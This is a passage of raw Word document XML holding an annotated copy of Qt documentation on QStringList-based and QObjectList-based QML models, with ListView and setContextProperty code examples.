      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="00521CB9">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2344" w:name="qstringlist-based-model"/>
      <w:bookmarkStart w:id="2345" w:name="_Toc483001035"/>
      <w:bookmarkStart w:id="2346" w:name="_Toc483004026"/>
      <w:bookmarkStart w:id="2347" w:name="_Toc483604376"/>
      <w:bookmarkStart w:id="2348" w:name="_Toc483605596"/>
      <w:bookmarkEnd w:id="2344"/>
      <w:r w:rsidRPr="00521CB9">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QStringList-based Model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2345"/>
      <w:bookmarkEnd w:id="2346"/>
      <w:bookmarkEnd w:id="2347"/>
      <w:bookmarkEnd w:id="2348"/>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 xml:space="preserve">A model may be a </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simple</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2605" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QStringList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which provides the contents of the list via the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modelData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>role.</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Here is a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2606" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with a delegate that references its model item's value using the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modelData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>role:</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</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width</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100</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height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100</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myModel</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delegate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Rectangle</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height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25</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width</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100</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Text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text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modelData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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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A Qt application can load this QML document and set the value of</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>myModel</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to a</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2607" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QStringList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QStringList</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> dataList</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dataList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append</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"Item 1"</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dataList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append</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"Item 2"</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dataList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append</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"Item 3"</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dataList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append</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"Item 4"</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QQuickView</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> view</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QQmlContext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ctxt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view</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rootContext</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="008D4C56" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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D4C56">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ctxt</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setContextProperty</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str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"myModel"</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QVariant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fromValue</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dataList</w:t>
      </w:r>
      <w:r w:rsidRPr="008D4C56">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>));</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 xml:space="preserve">The complete source code for this </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is available in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2608" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>examples/quick/models/stringlistmodel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>within the Qt install directory.</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b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D43AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>There is no way for the view to know that the contents of a</w:t>
      </w:r>
      <w:r w:rsidRPr="009D43AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2609" w:history="1">
        <w:r w:rsidRPr="009D43AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QStringList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009D43AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D43AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have changed. If the</w:t>
      </w:r>
      <w:r w:rsidRPr="009D43AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2610" w:history="1">
        <w:r w:rsidRPr="009D43AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QStringList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009D43AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D43AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changes, it will be necessary to reset the model by calling</w:t>
      </w:r>
      <w:r w:rsidRPr="009D43AA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2611" w:anchor="setContextProperty" w:history="1">
        <w:r w:rsidRPr="009D43AA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlContext::setContextProperty</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009D43AA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRPr="0088385D" w:rsidRDefault="0088385D" w:rsidP="009D43AA">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2349" w:name="qobjectlist-based-model"/>
      <w:bookmarkStart w:id="2350" w:name="_Toc483001036"/>
      <w:bookmarkStart w:id="2351" w:name="_Toc483004027"/>
      <w:bookmarkStart w:id="2352" w:name="_Toc483604377"/>
      <w:bookmarkStart w:id="2353" w:name="_Toc483605597"/>
      <w:bookmarkEnd w:id="2349"/>
      <w:r w:rsidRPr="009D43AA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QObjectList-based model</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2350"/>
      <w:bookmarkEnd w:id="2351"/>
      <w:bookmarkEnd w:id="2352"/>
      <w:bookmarkEnd w:id="2353"/>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 xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>list of</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2612" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>* values</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also be used as a model. A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2613" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:hyperlink r:id="rId2614" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">*&gt; provides the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties of the objects in the list as roles</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088385D" w:rsidRDefault="0088385D" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following application creates a</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DataObject</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class with</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2615" w:anchor="Q_PROPERTY" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_PROPERTY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values that will be accessible as named roles when a</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2616" w:history="1">
        <w:r w:rsidRPr="0088385D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QList</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;DataObject*&gt; is exposed to QML:</w:t>
      </w:r>
      <w:r w:rsidR="00AC1824">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F02B0">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00AC1824" w:rsidRPr="00AC1824">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidR="000F02B0">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00351F62" w:rsidRPr="00AC1824" w:rsidRDefault="00351F62" w:rsidP="0088385D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>class</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DataObject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public</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QObject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Q_OBJECT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Q_PROPERTY</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QString</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> name READ name WRITE setName NOTIFY nameChanged</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Q_PROPERTY</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QString</w:t>
      </w:r>
      <w:r w:rsidRPr="0088385D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
